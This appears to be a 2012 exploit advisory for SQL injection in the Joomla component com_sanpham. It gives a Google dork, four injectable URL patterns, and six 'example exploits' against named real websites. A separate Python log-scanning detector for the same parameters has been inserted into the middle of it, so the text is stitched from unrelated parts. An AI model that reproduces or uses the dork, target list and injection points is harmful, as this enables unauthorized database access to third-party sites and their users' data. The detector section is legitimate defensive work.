[ Joomla Component com_sanpham SQL Injection Vulnerability ]
#[~] Author : the_cyber_nuxbie
#[~] Home : www.thecybernuxbie.com
#[~] E-mail : staff@thecybernuxbie.com
#[~] Found : 20 January 2012 - 07:45 PM.
#[~] Tested On : Windows 7 Ultimate.
#[~] Google Dork : inurl:"/index.php?option=com_sanpham"
[x] exploits:
http://localhost/index.php?option=com_sanpham&view=sanpham&kindid=[SQLi]
http://localhost/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=[SQLi]
http://localhost/index.php?option=com_sanpham&view=product&modelsid=[SQLi]
http://localhost/index.php?option=com_sanpham&view=product&markid=1&modelsid=[SQLi]
- Example Exploits:
http://one-designer.com/index.php?option=com_sanpham&view=sanpham&kindid=1' [SQLi]
http://chickyclub.asia/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=139' [SQLi]
http://chickyclub.asia/index.php?option=com_sanpham&view=product&modelsid=4' [SQLi]
http://mtcauto.com.vn/index.php?option=com_sanpham&view=product&markid=1&modelsid=2' [SQLi]
http://goby.vn/index.php?option=com_sanpham&view=product&task=detail&modelsid=6&cid=185' [SQLi]
http://vppanbinh.com.vn/index.php?option=com_sanpham&view=product&task=detail&modelsid=3&cid=46' [SQLi]
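Detection side of the parameter list above, as an added example that is not part of the original advisory: it scans web access log lines for com_sanpham requests whose kindid, cid, modelsid or markid value is not a plain integer. The integer-only rule is an assumption drawn from the numeric values shown in the URLs; the log format, helper names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory lists as injectable; assumed here to be integer IDs.
ID_PARAMS = ("kindid", "cid", "modelsid", "markid")
# Minimal matcher for the client and request fields of a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return {param: value} for com_sanpham ID parameters that are not plain integers."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_sanpham" not in query.get("option", []):
        return {}
    bad = {}
    for name in ID_PARAMS:
        for value in query.get(name, []):
            # parse_qs has already percent-decoded the value (%27 -> ').
            if not re.fullmatch(r"\d{1,10}", value):
                bad[name] = value
    return bad

def scan(lines):
    """Yield (client_ip, url, bad_params) for each log line worth reviewing."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        bad = suspicious_params(m.group(2))
        if bad:
            yield m.group(1), m.group(2), bad

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jan/2012:19:45:01 +0700] "GET /index.php?option=com_sanpham&view=sanpham&kindid=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Jan/2012:19:46:12 +0700] "GET /index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=139%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [20/Jan/2012:19:46:15 +0700] "GET /index.php?option=com_sanpham&view=product&markid=1&modelsid=2%27 HTTP/1.1" 500 312',
    '203.0.113.5 - - [20/Jan/2012:19:47:00 +0700] "GET /index.php?option=com_content&view=article&id=3%27 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, url, bad in scan(SAMPLE_LOG):
        print(ip, bad, url)
```

A flagged line is a lead for review, not proof of compromise; the same integer-only rule can be enforced in front of the component until the queries themselves bind these parameters as integers.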
- N0T35:
0day no more...
"n0 d0rk f0r kiddi0t"
Thanks To:
All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc...
- 20 January 2012, GMT +07:35, IT-Underground, Indonesia.